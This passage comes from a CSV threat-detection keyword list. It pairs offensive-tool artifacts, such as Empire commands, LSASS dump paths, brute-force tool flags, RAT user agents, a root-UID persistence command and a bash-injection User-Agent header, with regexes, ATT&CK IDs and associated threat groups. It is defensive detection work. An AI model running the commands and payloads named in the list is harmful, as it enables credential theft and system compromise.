T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62006"
"*usemodule privesc/*",".{0,1000}usemodule\sprivesc\/.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62007"
"*useplugin csharpserver*",".{0,1000}useplugin\scsharpserver.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62008"
"*UsePrtAdminAccount*",".{0,1000}UsePrtAdminAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","62009"
"*UsePrtImperonsationAccount*",".{0,1000}UsePrtImperonsationAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","62010"
"*user aborted during DBMS fingerprint.*",".{0,1000}user\saborted\sduring\sDBMS\sfingerprint\..{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","62011"
"*user Inveigh*",".{0,1000}user\sInveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","62012"
"*--user orbitaldump*",".{0,1000}\-\-user\sorbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","62013"
"*user_eq_pass_valid_cme_*.txt*",".{0,1000}user_eq_pass_valid_cme_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62015"
"*--user_file*--password_file*",".{0,1000}\-\-user_file.{0,1000}\-\-password_file.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","62016"
"*user_password.rb*",".{0,1000}user_password\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62017"
"*user_to_secretsdump.py*",".{0,1000}user_to_secretsdump\.py.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","62018"
"*user|username|login|pass|password|pw|credentials*",".{0,1000}user\|username\|login\|pass\|password\|pw\|credentials.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","62019"
"*USER=!!ABSENT!!*OPERATION=adduser*MODGROUP=admin*",".{0,1000}USER\=!!ABSENT!!.{0,1000}OPERATION\=adduser.{0,1000}MODGROUP\=admin.{0,1000}","offensive_tool_keyword","POC","Ivanti Authent Bypass CVE-2024-7593 - Successful exploitation could lead to authentication bypass and creation of an administrator user","T1078 - T1136 - T1078.001","TA0006 - TA0004 - TA0005","N/A","N/A","Credential Access","https://x.com/mthcht/status/1823463842459848906","1","0","N/A","in ivanti vtm audit logs","10","10","N/A","N/A","N/A","N/A","62020"
"*UserAgent = ""Rubeus/1.0""*",".{0,1000}UserAgent\s\=\s\""Rubeus\/1\.0\"".{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","62023"
"*User-Agent*NIKMOK*",".{0,1000}User\-Agent.{0,1000}NIKMOK.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","user agent NIKMOK observed in AsyncRAT sample","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","Asyncrat - Redline","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","Malware","https://x.com/g0njxa/status/1829177645348860120","1","0","#useragent","https://www.virustotal.com/gui/file/810791ccd63225a766dd580e0e83d502df14172812fb912997e6a844bc9d7f6c/","9","10","N/A","N/A","N/A","N/A","62024"
"*useragent*OWASP Amass*",".{0,1000}useragent.{0,1000}OWASP\sAmass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","62025"
"*user-agent*OWASP Amass*",".{0,1000}user\-agent.{0,1000}OWASP\sAmass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","62026"
"*User-Agent: *echo; echo; /bin/bash -c *",".{0,1000}User\-Agent\:\s.{0,1000}echo\;\secho\;\s\/bin\/bash\s\-c\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux #useragent","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","62028"
"*'User-Agent: alex666'*",".{0,1000}\'User\-Agent\:\salex666\'.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#useragent","N/A","7","10","N/A","N/A","N/A","N/A","62029"
"*'User-Agent: attacker'*",".{0,1000}\'User\-Agent\:\sattacker\'.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","0","#useragent","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","62030"
"*User-Agent: JustKidding*",".{0,1000}User\-Agent\:\sJustKidding.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#useragent","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","62031"
"*'User-Agent': 'JustKidding'*",".{0,1000}\'User\-Agent\'\:\s\'JustKidding\'.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#useragent","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","62032"
"*User-Agent: pproxy-*",".{0,1000}User\-Agent\:\spproxy\-.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","62033"
"*'User-Agent':'CanisRufus'*",".{0,1000}\'User\-Agent\'\:\'CanisRufus\'.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","#useragent","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","62034"
"*--user-data-dir=C:\\chrome-dev-profile23 --remote-debugging-port=9222*",".{0,1000}\-\-user\-data\-dir\=C\:\\\\chrome\-dev\-profile23\s\-\-remote\-debugging\-port\=9222.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","62035"
"*userenum-password-timing*",".{0,1000}userenum\-password\-timing.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","62036"
"*UserHunterImplant*",".{0,1000}UserHunterImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62037"
"*usermod -u 0 -o *",".{0,1000}usermod\s\-u\s0\s\-o\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","62039"
"*Username to use for ADWS Connection. Format: domain\\user or user@domain*",".{0,1000}Username\sto\suse\sfor\sADWS\sConnection\.\sFormat\:\sdomain\\\\user\sor\suser\@domain.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","62040"
"*username-anarchy *",".{0,1000}username\-anarchy\s.{0,1000}","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","Black Basta","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","0","N/A","N/A","N/A","10","1000","140","2024-09-20T01:57:59Z","2012-11-07T05:35:10Z","62041"
"*UsernameAsPasswordCreds.txt*",".{0,1000}UsernameAsPasswordCreds\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62042"
"*userpass_cme_check*",".{0,1000}userpass_cme_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62043"
"*userpass_kerbrute_check*",".{0,1000}userpass_kerbrute_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62044"
"*UserPassBruteForce*",".{0,1000}UserPassBruteForce.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","62045"
"*UserRightsUtil.exe -m enum*",".{0,1000}UserRightsUtil\.exe\s\-m\senum.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","62046"
"*users/public/troubleshooting_log.log*",".{0,1000}users\/public\/troubleshooting_log\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","62047"
"*users\\public\\elevationstation.js*",".{0,1000}users\\\\public\\\\elevationstation\.js.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62048"
"*Users\\Public\\lsass.dmp*",".{0,1000}Users\\\\Public\\\\lsass\.dmp.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","62049"
"*Users\\Public\\panda.sense*",".{0,1000}Users\\\\Public\\\\panda\.sense.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","62050"
"*users\\usethis\\NewFile.txt*",".{0,1000}users\\\\usethis\\\\NewFile\.txt.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","62051"
"*Users\Public\callback.el*",".{0,1000}Users\\Public\\callback\.el.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","62052"
"*users\public\example.bin*",".{0,1000}users\\public\\example\.bin.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","62053"
"*Users\Public\panda.sense*",".{0,1000}Users\\Public\\panda\.sense.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","62054"
"*users\public\temp.bin*",".{0,1000}users\\public\\temp\.bin.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","62055"
"*users_asreproast.txt*",".{0,1000}users_asreproast\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62056"
"*users_dcsrp_full.txt*",".{0,1000}users_dcsrp_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62057"
"*users_kerberoasting.txt*",".{0,1000}users_kerberoasting\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","62058"
"*users_list_cme_ldap_nullsess_*",".{0,1000}users_list_cme_ldap_nullsess_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62059"
"*users_list_kerbrute_*",".{0,1000}users_list_kerbrute_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","62060"
